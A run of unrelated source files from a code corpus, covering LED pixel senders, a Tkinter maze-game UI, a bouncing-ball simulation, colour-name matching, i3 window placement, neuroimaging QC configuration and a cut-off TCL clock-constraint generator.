            # Resend continuously at a fixed frequency (Hz).
            self.repeat_mode = "rate"
            self.repeat_rate = float(self.args.rate)
            print("Repeat Mode: Frequency")
            print('Frequency Set:', self.repeat_rate)
        else:
            # Send a fixed number of frames (default: exactly one).
            self.repeat_mode = "loop"
            if self.args.loop:
                self.range = range(int(args.loop))
                print("Repeat Mode: Loop")
                print("Loops Count:", args.loop)
            else:
                print("Repeat Mode: None, send once")
                self.range = range(1)

    def set(self, index, c, b, g, r):
        """Write one pixel's 4-byte frame (control, blue, green, red).

        ``None`` or out-of-range indices are silently ignored.
        """
        if index is not None and index < self.pixel_count:
            i = index * 4
            self.data[i] = c
            self.data[i+1] = b
            self.data[i+2] = g
            self.data[i+3] = r

    def run(self):
        """Drive on_loop() per the configured repeat mode until done or
        interrupted, then close the connection."""
        if self.repeat_mode == "loop":
            try:
                for i in self.range:
                    self.on_loop()
            except KeyboardInterrupt:
                pass
        elif self.repeat_mode == "rate":
            rate = 1.0 / self.repeat_rate  # seconds between frames
            try:
                while True:
                    time.sleep(rate)
                    self.on_loop()
            except KeyboardInterrupt:
                pass

        if self.connection:
            self.connection.close()

    def send(self):
        """Frame self.data with start/end bytes and send it, lazily opening
        the connection on first use."""
        if not self.connection:
            # Environment variables override the configured host/port.
            # Fixed: dict.has_key() was removed in Python 3 — use `in`.
            if 'DOTSTAR_HOST' in os.environ:
                host = os.environ.get('DOTSTAR_HOST')
            else:
                host = config.get("HOST")
            if 'DOTSTAR_PORT' in os.environ:
                port = os.environ.get('DOTSTAR_PORT')
            else:
                port = config.get("PORT")
            self.connection = Client((host, port))

        # Start frame: four zero bytes.
        out_buffer = bytearray()
        out_buffer += bytearray((0x00, 0x00, 0x00, 0x00))
        out_buffer += self.data

        # End frame: one 0xFF byte per 16 pixels, rounded up. Integer
        # division (//) replaces the old float division + int() round-trip.
        if self.pixel_count:
            footer_len = (self.pixel_count + 15) // 16
        else:
            footer_len = ((len(self.data) // 4) + 15) // 16
        for i in range(footer_len):
            # This is different than AdaFruit library, which uses zero's in
            # the xfer[2] spi_ioc_transfer struct.
            out_buffer.append(0xFF)

        self.connection.send(out_buffer)

    def on_loop(self):
        """Fill self.data and send it; implemented by subclasses."""
        raise NotImplementedError

    def rand_color(self):
        """Return a pygame Color with random 8-bit r/g/b components."""
        r = random.randint(0, 255)
        g = random.randint(0, 255)
        b = random.randint(0, 255)
        return pygame.Color(r, g, b)
class RandomBlendApp(App):
    """Fills the grid with a smooth four-corner blend of random colors."""

    data_type = "Random blend"

    def fill_dummy(self):
        """Pick four random corner colors and bilinearly blend across the grid."""
        corner_a = self.rand_color()
        corner_b = self.rand_color()
        corner_c = self.rand_color()
        corner_d = self.rand_color()
        width = int(self.grid_size.x)
        height = int(self.grid_size.y)
        for col in range(width):
            col_frac = col / float(self.grid_size.x)
            for row in range(height):
                top = blend_color(corner_a, corner_b, col_frac)
                bottom = blend_color(corner_c, corner_d, col_frac)
                pixel = blend_color(top, bottom, row / float(self.grid_size.y))
                pixel_index = self.mapping_data.get(col, row)
                self.set(pixel_index, 0xFF, pixel.b, pixel.g, pixel.r)

    def on_loop(self):
        """Generate one blended frame and transmit it."""
        self.fill_dummy()
        self.send()
class RandomColorApp(App):
    """Fills every pixel of the grid with an independent random color."""

    data_type = "Random colors"

    def fill_dummy(self):
        """Assign a fresh random color to each (col, row) cell."""
        for col in range(int(self.grid_size.x)):
            for row in range(int(self.grid_size.y)):
                pixel_index = self.mapping_data.get(col, row)
                color = self.rand_color()
                self.set(pixel_index, 0xFF, color.b, color.g, color.r)

    def on_loop(self):
        """Generate one random frame and transmit it."""
        self.fill_dummy()
        self.send()
class FillApp(App):
    """Fills the whole grid with a single user-supplied color.

    The color argument may be a "(b,g,r)" byte tuple or any color name /
    format that pygame.Color understands.
    """

    data_type = "Fill single color"

    def fill(self, b, r, g):
        """Write the same (b, g, r) color to every mapped pixel.

        (Fixed: dropped a leftover per-pixel debug print.)
        """
        for index in range(self.mapping_data.pixel_count):
            self.set(index, 0xFF, b, g, r)

    def on_loop(self):
        """Parse self.args.fill into b/g/r components, fill and transmit."""
        fill = self.args.fill
        if fill.startswith("(") and fill.endswith(")"):
            # "(b,g,r)" tuple form.
            try:
                parts = fill[1:-1].split(",")
                b = int(parts[0])
                g = int(parts[1])
                r = int(parts[2])
            except (ValueError, IndexError) as exc:
                # Narrowed from a bare `except:` so unrelated bugs still surface;
                # chain the cause for easier debugging.
                raise AttributeError("Could not parse color") from exc
        else:
            # Named/hex color form, delegated to pygame.
            try:
                color = pygame.Color(fill)
                b = color.b
                r = color.r
                g = color.g
            except ValueError as exc:
                raise AttributeError("Could not parse color") from exc
        self.fill(b, r, g)
        self.send()
class ImageApp(App):
    """Displays the top-left corner of an image file on the grid."""

    data_type = "Image"

    def on_loop(self):
        """Load self.args.image, copy its pixels onto the grid and transmit."""
        filename = self.args.image
        if not os.path.isfile(filename):
            raise AttributeError("image file not found")

        im = Image.open(filename)
        rgb_im = im.convert('RGB')
        # Clamp the copied region to whichever is smaller: grid or image.
        width = min(self.grid_size.x, im.size[0])
        height = min(self.grid_size.y, im.size[1])
        for col in range(int(width)):
            for row in range(int(height)):
                r, g, b = rgb_im.getpixel((col, row))
                self.set(self.mapping_data.get(col, row), 0xFF, b, g, r)
        self.send()
def start_send_test_data_app(args):
    """Pick the sender app matching the CLI arguments and run it once.

    Falls back to the random-blend app when no specific mode is requested.
    """
    config.read_configuration()

    dispatch = (
        ('fill', FillApp),
        ('image', ImageApp),
        ('rand', RandomColorApp),
    )
    for attr, app_cls in dispatch:
        if attr in args and getattr(args, attr) is not None:
            app_cls(args).run()
            return
    RandomBlendApp(args).run()
| StarcoderdataPython |
1623609 | from tkinter import *
from os import system
from platform import system as platform
class UIController:
    """Tk window wrapper exposing the stage title, game canvas and score."""

    def __init__(self):
        """Build the window, force it to the foreground and lay out widgets."""
        root = Tk()
        root.lift()
        # Flash "always on top" once so the new window grabs the foreground,
        # then immediately drop the flag and force focus.
        root.wm_attributes("-topmost", True)
        root.after_idle(root.call, 'wm', 'attributes', '.', "-topmost", False)
        root.after(1, lambda: root.focus_force())
        if platform() == 'Darwin':  # How Mac OS X is identified by Python
            system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
        self.root = root

        header = Frame(root)
        header.pack()
        title_label = Label(header, text='第 000 關', font=("Helvetica", 16))
        title_label.pack(side=LEFT)

        body = Frame(root)
        body.pack()
        game_canvas = Canvas(body, height=480, width=640, bg='gray')
        game_canvas.pack()

        footer = Frame(root)
        footer.pack(fill=X)
        help_label = Label(footer,
                           justify=LEFT,
                           text='遊戲說明:\n方向鍵按下去以後,會滑到底才可以決定下一個行進方向。\n遊戲目標是要移動到金色區域(出口)。')
        help_label.pack(side=LEFT)
        score_label = Label(footer,
                            text='Score: 0\nMoves: 0')
        score_label.pack(side=RIGHT)

        self.stage_name = title_label
        self.canvas = game_canvas
        self.score = score_label
        self.update_queue = []

    def mainloop(self):
        """Enter the Tk event loop (blocks until the window closes)."""
        self.root.mainloop()

    def use_canvas(self, obj, f):
        """Apply *f* to (obj, canvas) immediately — e.g. to add an item."""
        f(obj, self.canvas)

    def add_update(self, obj, f):
        """Queue *f* to run against (obj, canvas) on the next update_all()."""
        self.update_queue.append([obj, f])

    def update_all(self):
        """Run every queued update against the canvas, then clear the queue."""
        for queued_obj, queued_f in self.update_queue:
            queued_f(queued_obj, self.canvas)
        self.update_queue = []

    def update_player_info(self, info):
        """Refresh the score label from a player-info dict."""
        total = info.get('score', 0) + info.get('current_stage_score')
        self.score.config(text='Score: {}\nMoves: {}'.format(
            total, info['total_keypress']))

    def update_stage_info(self, level_data):
        """Refresh the stage title from level metadata."""
        self.stage_name.config(text='第 {} 關: {}'.format(
            level_data.get('level', '?'), level_data.get('title', '')))

    def reset_canvas(self):
        """Remove every item from the game canvas."""
        self.canvas.delete("all")
| StarcoderdataPython |
3275657 | <filename>fdm-devito-notebooks/01_vib/exer-vib/bouncing_ball.py
import numpy as np
def solver(H, C_R, dt, T, eps_v=0.01, eps_h=0.01):
    """
    Simulate bouncing ball until it comes to rest. Time step dt.
    h(0)=H (initial height). T: maximum simulation time.
    Method: Euler-Cromer.

    :param H: initial drop height.
    :param C_R: coefficient of restitution applied at each impact.
    :param dt: time step.
    :param T: maximum simulated time before giving up.
    :param eps_v: velocity threshold for detecting rest/impact.
    :param eps_h: height threshold for detecting ground contact.
    :return: (h, v, t) arrays truncated at the step where rest (or a second
        consecutive impact) is detected.
    :raises ValueError: if the ball has not come to rest within T.
    """
    dt = float(dt)
    Nt = int(round(T/dt))
    h = np.zeros(Nt+1)
    v = np.zeros(Nt+1)
    t = np.linspace(0, Nt*dt, Nt+1)
    # NOTE(review): 0.81 looks like a typo for the gravitational
    # acceleration 9.81 m/s^2 — confirm before relying on the physics.
    g = 0.81
    v[0] = 0
    h[0] = H
    mode = 'free fall'
    for n in range(Nt):
        # Euler-Cromer: update v first, then use the *new* v for h.
        v[n+1] = v[n] - dt*g
        h[n+1] = h[n] + dt*v[n+1]

        if h[n+1] < eps_h:
            #if abs(v[n+1]) > eps_v: # handles large dt, but is wrong
            if v[n+1] < -eps_v:
                # Impact: reverse and damp the velocity, pin ball to ground.
                v[n+1] = -C_R*v[n+1]
                h[n+1] = 0
                if mode == 'impact':
                    # Two impacts in a row: treat the ball as at rest.
                    return h[:n+2], v[:n+2], t[:n+2]
                mode = 'impact'
            elif abs(v[n+1]) < eps_v:
                mode = 'rest'
                v[n+1] = 0
                h[n+1] = 0
                return h[:n+2], v[:n+2], t[:n+2]
            else:
                mode = 'free fall'
        else:
            mode = 'free fall'
        # Fixed: Python-2 print statement -> print() function, so the
        # module is importable under Python 3.
        print('%4d v=%8.5f h=%8.5f %s' % (n, v[n+1], h[n+1], mode))
    raise ValueError('T=%g is too short simulation time' % T)
import matplotlib.pyplot as plt

# Demo run: drop from 1 m with restitution 0.8 and a fine time step.
h, v, t = solver(
    H=1, C_R=0.8, T=100, dt=0.0001, eps_v=0.01, eps_h=0.01)
# Height vs. time.
plt.plot(t, h)
# NOTE(review): legend() expects a sequence of labels; a bare string is
# iterated per character — works for one-letter labels but legend(['h'])
# would be clearer.
plt.legend('h')
plt.savefig('tmp_h.png'); plt.savefig('tmp_h.pdf')
# Velocity vs. time in a second figure.
plt.figure()
plt.plot(t, v)
plt.legend('v')
plt.savefig('tmp_v.png'); plt.savefig('tmp_v.pdf')
plt.show()
| StarcoderdataPython |
175100 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import bs4 as BeautifulSoup
import json
import os
import requests
from colormath.color_conversions import convert_color
from colormath.color_diff import delta_e_cie1976
from colormath.color_objects import LabColor, sRGBColor
from pycolorname.utilities import PROJECT_PATH
class ColorSystem(dict):
    """
    Provides an interface for a color system.

    Behaves like a dict mapping color names to RGB triples, with values
    normalised to tuples on access, plus JSON-file caching of data fetched
    by a subclass-provided refresh().
    """
    def value_preprocess(self, value):
        """Normalise a stored value: 3-element lists become tuples."""
        if isinstance(value, list) and len(value) == 3:
            return tuple(value)
        return value

    def __getitem__(self, key):
        # Route raw dict access through value_preprocess so JSON-loaded
        # lists come back as tuples.
        return self.value_preprocess(dict.__getitem__(self, key))

    def items(self):
        # NOTE(review): unlike dict.items(), this returns a one-shot
        # generator (not a view) — callers must not iterate it twice.
        return ((key, self.value_preprocess(val))
                for key, val in dict.items(self))

    def data_file(self):
        """Return the default cache path, derived from the subclass module."""
        modulename = self.__module__
        return os.path.join(PROJECT_PATH, "data", modulename + ".json")

    def load(self, filename=None, refresh=False):
        """
        Try to load the data from a pre existing data file if it exists.
        If the data file does not exist, refresh the data and save it in
        the data file for future use.
        The data file is a json file.
        :param filename: The filename to save or fetch the data from.
        :param refresh: Whether to force refresh the data or not
        """
        filename = filename or self.data_file()
        dirname = os.path.dirname(filename)
        if refresh is False:
            # Fast path: read the cached JSON and replace our contents.
            try:
                data = None
                with open(filename) as fp:
                    data = json.load(fp)
                self.clear()
                self.update(data)
                return
            except (ValueError, IOError):
                # Refresh data if reading gave errors
                pass
        # Slow path: fetch fresh data, replace our contents and cache it.
        data = self.refresh()
        self.clear()
        self.update(data)
        if not os.path.isdir(dirname):
            os.makedirs(dirname)
        with open(filename, 'w') as fp:
            json.dump(data, fp,
                      sort_keys=True,
                      indent=2,
                      separators=(',', ': '))

    def refresh(self):
        """
        Refreshes the cached data from the URL provided for this color system.

        Subclasses must implement this and return a name -> color mapping.
        """
        raise NotImplementedError

    def request(self, *args, **kwargs):
        """
        Gets the request using the `_url` and converts it into a
        beautiful soup object.
        :param args: The args to pass on to `requests`.
        :param kwargs: The kwargs to pass on to `requests`.
        """
        response = requests.request(*args, **kwargs)
        return BeautifulSoup.BeautifulSoup(response.text, "html.parser")

    def hex_to_rgb(self, value):
        """Convert '#RGB'/'#RRGGBB' (leading '#' optional) to an (r, g, b) tuple."""
        val = value
        if val[0] == '#':  # Remove # if it's present
            val = val[1:]
        # Convert to array with 3 hex values
        if len(val) == 3:  # Catch cases where 3 letter hex is used eg: #aaa
            val = [val[i] * 2 for i in range(len(val))]
        elif len(val) == 6:
            val = [val[i:i+2] for i in range(0, len(val), 2)]
        else:
            raise ValueError("Invalid value given for hex {0}".format(value))
        return tuple(int(v, 16) for v in val)

    def find_closest(self, color):
        """
        Find the closest color in the system to the given rgb values.
        :param color: Tuple of r, g, b values (scaled to 255).
        :returns: Tuple of name and rgb closest to the given color.
        """
        # Find distance between colors and find name based on closest color
        # (delta-E 1976 in Lab space, linear scan over every known color).
        rgb = sRGBColor(*color)
        lab = convert_color(rgb, LabColor, target_illuminant='D65')
        min_diff = float("inf")
        min_name, min_color = "", ()
        for known_name, known_color in self.items():
            known_rgb = sRGBColor(*known_color)
            known_lab = convert_color(known_rgb, LabColor,
                                      target_illuminant='D65')
            diff = delta_e_cie1976(lab, known_lab)
            if min_diff > diff:
                min_diff = diff
                min_name = known_name
                min_color = known_color
        return min_name, min_color
| StarcoderdataPython |
3313269 | <filename>tests/excerptexport/permission_test_helper.py
import pytest
from osmaxx.profile.models import Profile
@pytest.mark.django_db
class PermissionHelperMixin(object):
    """Test mixin that gives ``self.user`` an e-mail (optionally 'verified').

    Expects the consuming test class to provide ``self.user`` (a Django
    user instance) before these helpers are called.
    """

    def add_email(self):
        # NOTE(review): '<EMAIL>' is a dataset-anonymisation placeholder —
        # replace with a real address before using this fixture.
        self.user.email = '<EMAIL>'
        self.user.save()

    def add_valid_email(self):
        # A Profile whose unverified_email matches the user's address marks
        # it as usable for osmaxx permission checks — TODO confirm semantics.
        self.add_email()
        Profile.objects.get_or_create(associated_user=self.user, unverified_email='<EMAIL>')
| StarcoderdataPython |
1681399 | #!/usr/bin/env python3
"""
Contains the QC settings dictionary for all cifti_vis scripts, as well as
a class to make access to settings easy to read.
"""
import os
import sys
import logging
from abc import ABCMeta, abstractmethod
from PIL import Image
import yaml
import ciftify.config as config
from ciftify.utils import run, TempDir, add_metaclass
class Config:
    """Per-mode QC configuration: resolves the scene template, builds the
    Scene objects and orders the images used for report generation."""

    def __init__(self, mode):
        """
        :param mode: name of a QC mode defined in qc_modes.yaml.
        """
        self.__qc_settings = self.__read_mode(mode)
        self.template_name = self.__qc_settings['TemplateFile']
        self.template = self.__get_template()
        self.__scene_dict = self.__get_scene_dict()
        self.images = self.__get_images()
        self.subtitle = self.__get_subtitle()

    def get_navigation_list(self, path=''):
        """Return the nav-bar entries: a 'View:' header, one entry per
        indexable image, then a final 'Index' link (hrefs relative to *path*)."""
        nav_list = [{'href': '', 'label': 'View:'}]
        for image in self.images:
            if image.make_index:
                image_path = os.path.join(path, '{}.html'.format(image.name))
                nav_list.append({'href': image_path,
                                 'label': image.name})
        index_path = os.path.join(path, 'index.html')
        nav_list.append({'href': index_path, 'label': 'Index'})
        return nav_list

    def get_template_contents(self):
        """Read and return the scene template file, exiting on failure.

        Fixed: `logger` was never defined in this method (the module-level
        getLogger() result is discarded), so both error paths raised
        NameError instead of logging. Also narrowed the bare `except:`.
        """
        logger = logging.getLogger(__name__)
        try:
            with open(self.template) as template_txt:
                template_contents = template_txt.read()
        except OSError:
            logger.error("{} cannot be read.".format(self.template))
            sys.exit(1)
        if not template_contents:
            logger.error("Template {} is empty".format(self.template))
            sys.exit(1)
        return template_contents

    def __read_mode(self, mode):
        """Load qc_modes.yaml and return the settings dict for *mode*,
        exiting with an error message when the file or mode is missing."""
        logger = logging.getLogger(__name__)
        ciftify_data = config.find_ciftify_global()
        qc_settings = os.path.join(ciftify_data, 'qc_modes.yaml')
        try:
            with open(qc_settings) as qc_stream:
                qc_modes = yaml.load(qc_stream, Loader=yaml.SafeLoader)
        except (OSError, yaml.YAMLError):
            # Narrowed from a bare `except:` — unreadable or malformed YAML.
            logger.error("Cannot read qc_modes file: {}".format(qc_settings))
            sys.exit(1)

        try:
            settings = qc_modes[mode]
        except KeyError:
            logger.error("qc_modes file {} does not define mode {}"
                    "".format(qc_settings, mode))
            sys.exit(1)
        return settings

    def __get_template(self):
        """Locate the scene template file on disk, exiting if missing."""
        logger = logging.getLogger(__name__)
        template_dir = config.find_scene_templates()
        if not template_dir:
            logger.error("Cannot find scene templates. Please ensure "
                    "CIFTIFY_DATA shell variable is properly set.")
            sys.exit(1)
        template = os.path.join(template_dir, self.template_name)
        if not os.path.exists(template):
            logger.error("Expected template {} does not exist at path {}. "
                    "Please check CIFTIFY_DATA variable is correctly "
                    "set.".format(self.template_name, template))
            sys.exit(1)
        return template

    def __get_subtitle(self):
        """Return the optional IndexSubtitle setting (None when absent)."""
        try:
            subtitle = self.__qc_settings['IndexSubtitle']
        except KeyError:
            subtitle = None
        return subtitle

    def __get_scene_dict(self):
        """
        Generates a dict to help separate the scenes that are montage only
        from the scenes that appear individually on the page.
        """
        scene_dict = {}
        for scene_type in self.__qc_settings['scene_list']:
            cur_scene = Scene(scene_type)
            scene_dict[cur_scene.name] = cur_scene
        return scene_dict

    def __get_images(self):
        """Return all scenes sorted by their display order."""
        images = list(self.__scene_dict.values())
        images = sorted(images, key=lambda image: image.order)
        return images
@add_metaclass(ABCMeta)
class QCScene:
    """Common interface shared by all renderable QC images.

    Subclasses (e.g. Scene) describe one picture on a QC page and must
    implement make_image() to actually render it from a scene file.
    """

    _attributes = {}
    name = ''
    path = ''
    make_index = False
    order = 0

    def _get_attribute(self, key, manditory=True):
        """Look up key in this scene's attribute dict.

        Mandatory keys abort the program when missing; optional ones
        fall back to None.  (The 'manditory' spelling is kept because
        callers pass it by keyword.)
        """
        logger = logging.getLogger(__name__)
        if key in self._attributes:
            return self._attributes[key]
        if manditory:
            logger.error("Scene {} does not contain the key {}. "
                         "Exiting".format(self._attributes, key))
            sys.exit(1)
        return None

    @abstractmethod
    def make_image(self, output_path, scene_file):
        pass
class Scene(QCScene):
    """One renderable scene from the QC template.

    Wraps a single entry of the mode's scene_list: which scene index in
    the .scene file to render, at what size, and how it appears on the
    QC pages.
    """

    def __init__(self, attributes):
        # attributes is one entry (a dict) from the mode's scene_list
        self._attributes = attributes
        self.name = self._get_attribute('Name')
        self.make_index = self._get_attribute('MakeIndex')
        self.index = self._get_attribute('Idx')
        self.split_horizontal = self._get_attribute('SplitHorizontal')
        self.save_image = self._get_attribute('Keep')
        self.order = self._get_attribute('Order')
        # titles are optional presentation strings
        self.index_title = self._get_attribute('IndexTitle', manditory = False)
        self.subject_title = self._get_attribute('PreTitle', manditory = False)
        self.width = self.__get_width()
        self.height = self.__get_height()

    def make_image(self, output_loc, scene_file, logging='WARNING'):
        """Render this scene to output_loc using wb_command.

        NOTE: 'logging' here is the wb_command log level string, not the
        python logging module (which this parameter shadows).
        """
        if self.split_horizontal:
            self.path = self.__split(output_loc, scene_file, logging, self.width,
                    self.height)
            return
        self.__show_scene(output_loc, scene_file, logging, self.width, self.height)
        self.path = output_loc

    def __get_width(self):
        # Pixel width of the rendered image; defaults to 600 when unset.
        width = self._get_attribute('Width', manditory = False)
        if not width: width = 600
        return width

    def __get_height(self):
        # Pixel height of the rendered image; defaults to 400 when unset.
        height = self._get_attribute('Height', manditory = False)
        if not height: height = 400
        return height

    def __show_scene(self, output, scene_file, logging, width, height):
        # Render scene number self.index from scene_file via wb_command.
        run(['wb_command', '-logging', logging, '-show-scene',
                scene_file, str(self.index), output, str(width), str(height)])

    def __split(self, output_loc, scene_file, logging, width, height):
        """Render the scene, then paste its top and bottom halves side by
        side into one double-width, half-height image at output_loc."""
        with TempDir() as tmp_dir:
            tmp_img = os.path.join(tmp_dir, "scene{}.png".format(self.index))
            self.__show_scene(tmp_img, scene_file, logging, width, height)
            with Image.open(tmp_img) as img:
                half_the_height = height // 2
                img_top = img.crop((0, 0, width, half_the_height))
                img_btm = img.crop((0, half_the_height, width, height))
                # RGBA canvas twice as wide, half as tall as the render
                im2 = Image.new('RGBA', (int(width*2), half_the_height))
                im2.paste(img_top, (0, 0))
                im2.paste(img_btm, (width, 0))
                im2.save(output_loc)
        return output_loc

    def __repr__(self):
        return "<ciftify.qc_config.Scene({})>".format(self.name)

    def __str__(self):
        return self.name
# class Montage(QCScene):
# def __init__(self, attributes, scene_dict):
# self._attributes = attributes
# self.name = self._get_attribute('Name')
# self.pics = self._get_attribute('Pics')
# self.layout = self._get_attribute('Layout')
# self.make_index = self._get_attribute('MakeIndex')
# self.scenes = self.__get_scenes(scene_dict)
# self.order = self._get_attribute('Order')
#
# def __get_scenes(self, scene_dict):
# """
# This method will delete scenes from scene_dict if any are included in
# the montage but not labeled 'Keep'.
# """
# scenes = []
# for pic in self.pics:
# scene = scene_dict[pic]
# if not scene.save_image:
# del scene_dict[pic]
# scenes.append(scene)
# return scenes
#
# def make_image(self, output_loc, scene_file, logging='WARNING', width=600,
# height=400):
# montage_cmd=['montage', '-mode', 'concatenate', '-tile',
# self.layout]
# with TempDir() as tmp_dir:
# for scene in self.scenes:
# tmp_path = os.path.join(tmp_dir, "{}.png".format(scene.name))
# scene.make_image(tmp_path, scene_file, logging, width, height)
# montage_cmd.append(tmp_path)
# montage_cmd.append(output_loc)
# run(montage_cmd)
# self.path = output_loc
#
# def __repr__(self):
# return "<ciftify.qc_config.Montage({})>".format(self.name)
#
# def __str__(self):
# return self.name
def replace_path_references(template_contents, template_prefix, path, scene_file):
    """Substitute the <prefix>_ABSPATH and <prefix>_RELPATH placeholders.

    The absolute form is the resolved real path of 'path'; the relative
    form is computed relative to the directory containing scene_file.
    """
    real_path = os.path.realpath(path)
    scene_dir = os.path.dirname(scene_file)
    substitutions = {
        '{}_ABSPATH'.format(template_prefix): real_path,
        '{}_RELPATH'.format(template_prefix): os.path.relpath(real_path, scene_dir),
    }
    txt = template_contents
    for placeholder, value in substitutions.items():
        txt = txt.replace(placeholder, value)
    return txt
def replace_all_references(template_contents, template_prefix, path, scene_file):
    """Substitute all three placeholder forms: ABSPATH, RELPATH and BASE."""
    with_paths = replace_path_references(template_contents, template_prefix,
                                         path, scene_file)
    base_token = '{}_BASE'.format(template_prefix)
    return with_paths.replace(base_token, os.path.basename(path))
| StarcoderdataPython |
3382124 | <reponame>wonkalous/dotfiles
import subprocess
import json
import time
import sys
import re
def get_tree():
    """Query i3 for its full layout tree and return it as parsed JSON."""
    raw = subprocess.check_output(["i3-msg", "-t", "get_tree"])
    return json.loads(raw)
def get_wins():
    # Flatten the live i3 layout tree into a
    # {window_title: workspace_name} mapping.
    return dict(proc_tree(get_tree()))
def proc_tree(x):
    """Recursively walk the i3 tree, collecting (title, workspace) pairs.

    Containers are descended into; once a workspace node is reached the
    walk switches to proc_workspace, which tags windows with its name.
    """
    print(x['type'], len(x["nodes"]))  # debug trace of the traversal
    pairs = []
    if x["type"] == "workspace":
        for child in x["nodes"]:
            pairs.extend(proc_workspace(child, x["name"]))
    else:
        for child in x["nodes"]:
            pairs.extend(proc_tree(child))
    return pairs
def proc_workspace(x, ws):
    """Collect (window_title, workspace_name) pairs beneath one workspace."""
    if x["window"] is None:
        # container node: recurse into children
        collected = []
        for child in x["nodes"]:
            collected.extend(proc_workspace(child, ws))
        return collected
    # leaf node holding a real X window
    return [(x["name"], ws)]
def ascii_only(s, r=''):
    """Strip non-ASCII characters from s, substituting r for each.

    A backslash immediately followed by a non-ASCII character is treated
    as one escape unit: the pair collapses to a single substitution.
    """
    pieces = []
    i = 0
    n = len(s)
    while i < n:
        ch = s[i]
        if ch == "\\" and i + 1 < n and ord(s[i + 1]) >= 128:
            # escaped non-ASCII: replace both characters with r once
            pieces.append(r)
            i += 2
            continue
        pieces.append(r if ord(ch) >= 128 else ch)
        i += 1
    return ''.join(pieces)
def place_wins(wins):
    """Move each window back to its saved workspace via i3-msg.

    wins maps window title -> workspace name/number.  Titles are turned
    into i3 title regexes: after regex-escaping, non-ASCII characters
    (which i3-msg mishandles) are replaced with '.' wildcards.
    """
    cmd = "[title=\"{title}\"] move --no-auto-back-and-forth window to workspace number {ws}"
    # BUG FIX: dict.iteritems() is Python 2 only and raises AttributeError
    # on Python 3; dict.items() behaves the same on both versions.
    for t, n in wins.items():
        # debug traces of the title transformation
        print(t, ascii_only(t))
        print(re.escape(t))
        print(ascii_only(re.escape(t)))
        cmd_ = cmd.format(title=ascii_only(re.escape(t), r='.'), ws=n)
        print("i3-msg '"+cmd_+"'")
        # raw_input()
        try:
            subprocess.check_output([
                "i3-msg",
                cmd_
            ])
        except Exception as e:
            # i3-msg can fail on unusual titles
            # (CalledProcessError, UnicodeEncodeError); log and continue
            print("ERROR: ", t, n)
            print(e)
if __name__ == '__main__':
    # CLI: 'save [file]' dumps the current title->workspace map to JSON
    # (default file name is timestamped); 'load <file>' restores it.
    if sys.argv[1] == 'save':
        wins = get_wins()
        if len(sys.argv) > 2:
            filename = sys.argv[2]
        else:
            filename = "wins_{}".format(int(time.time()))
        with open(filename, 'w+') as out:
            json.dump(wins, out)
    elif sys.argv[1] == 'load':
        with open(sys.argv[2], 'r') as wins_file:
            wins = json.load(wins_file)
        place_wins(wins)
#"[title=\"1966 - Google Chrome\"] move window to workspace number 13" | StarcoderdataPython |
147340 | #!/usr/bin/python3
# Minimal Attys streaming demo: connect to the first Attys device found
# and print every sample as it arrives.
import sys
sys.path.append('cpp')
import pyattyscomm
print("Searching for Attys")
# Scan for Attys devices and take the first one found.
s = pyattyscomm.AttysScan()
s.scan()
c = s.getAttysComm(0)
if (c == None):
    print("No Attys found")
    quit()
# Start acquisition, then poll for samples forever.
# NOTE(review): the inner 'pass' loop busy-waits at 100% CPU --
# presumably acceptable for this demo; confirm before reuse.
c.start()
while True:
    while (not c.hasSampleAvailable()):
        pass
    sample = c.getSampleFromBuffer()
    print(sample)
| StarcoderdataPython |
3272663 | <gh_stars>1-10
"""Convert the timeline CSV into the JSON structure used downstream.

Reads data/timeline.csv and writes ../data/timeline.json with two keys:
'events' (one dict per CSV row) and 'years' (unique years, in order of
first appearance).
"""
import csv
import json

input_path = 'data/timeline.csv'
output_path = '../data/timeline.json'

data = {}
data_list = []
years = []
with open(input_path, encoding="utf8") as csv_file:
    # BUG FIX: removed leftover per-row debug prints (the growing list
    # was printed after every row -- quadratic console output -- and
    # again, duplicated, after the loop).
    for row in csv.DictReader(csv_file):
        # insert(len(...), row) was just a roundabout append
        data_list.append(row)
        if row["year"] not in years:
            years.append(row["year"])

data["events"] = data_list
data["years"] = years
with open(output_path, 'w') as json_file:
    json.dump(data, json_file, indent=4)
3242017 | <gh_stars>10-100
import os
from pathlib import Path
# Name of the generated constraints file (written under ./outputs/).
OUTPUT_FILE = 'constraints.tcl'
# Parameters arrive through the environment, set by the build flow:
# the design name plus scaling factors for time/capacitance units and
# the main clock period.
design_name = os.environ['design_name']
time_scale = float(os.environ['constr_time_scale'])
cap_scale = float(os.environ['constr_cap_scale'])
main_per = float(os.environ['constr_main_per'])
# Period of the 4x clock: a quarter of the main period, in scaled units.
clk_4x_per = 0.25*main_per*time_scale
output = ''  # accumulates the generated TCL text below
output += f'''
# Modified from ButterPHY and Garnet constraints
############
# Main clock
############
# Frequency is 1.4 GHz (40% above nominal)
# For timining analysis, the IO of analog core is considered to be clocked on
# ext_clk (input) rather than clk_adc (output). Hence the ext_clk signal is
# declared to have the same frequency as clk_adc. This should be OK because there
# is no synthesized logic that actually runs on ext_clk, and the ext_clk transition
# time is set to be very fast later in this constraints file.
create_clock -name clk_main_buf \\
-period {main_per*time_scale} \\
-waveform {{0 {0.5*main_per*time_scale}}} \\
[get_pin ibuf_main/clk]
create_clock -name clk_retimer \\
-period {main_per*time_scale} \\
-waveform {{0 {0.5*main_per*time_scale}}} \\
[get_pins iacore/clk_adc]
#################
# Input buffers #
#################
# ibuf_async
create_clock -name clk_async \\
-period {main_per*time_scale} \\
-waveform {{0 {0.5*main_per*time_scale}}} \\
[get_pins ibuf_async/clk]
# ibuf_main already covered above...
# ibuf_mdll_ref
create_clock -name clk_mdll_ref_p \\
-period {clk_4x_per} \\
-waveform {{0 {0.5*clk_4x_per}}} \\
[get_pins ibuf_mdll_ref/clk]
create_clock -name clk_mdll_ref_n \\
-period {clk_4x_per} \\
-waveform {{0 {0.5*clk_4x_per}}} \\
[get_pins ibuf_mdll_ref/clk_b]
# ibuf_mdll_mon
create_clock -name clk_mdll_mon_p \\
-period {main_per*time_scale} \\
-waveform {{0 {0.5*main_per*time_scale}}} \\
[get_pins ibuf_mdll_mon/clk]
create_clock -name clk_mdll_mon_n \\
-period {main_per*time_scale} \\
-waveform {{0 {0.5*main_per*time_scale}}} \\
[get_pins ibuf_mdll_mon/clk_b]
##############
# MDLL clock #
##############
create_clock -name clk_mdll \\
-period {clk_4x_per} \\
-waveform {{0 {0.5*clk_4x_per}}} \\
[get_pins minv_i/DOUT]
#############
# TX clocks #
#############
# Input divider
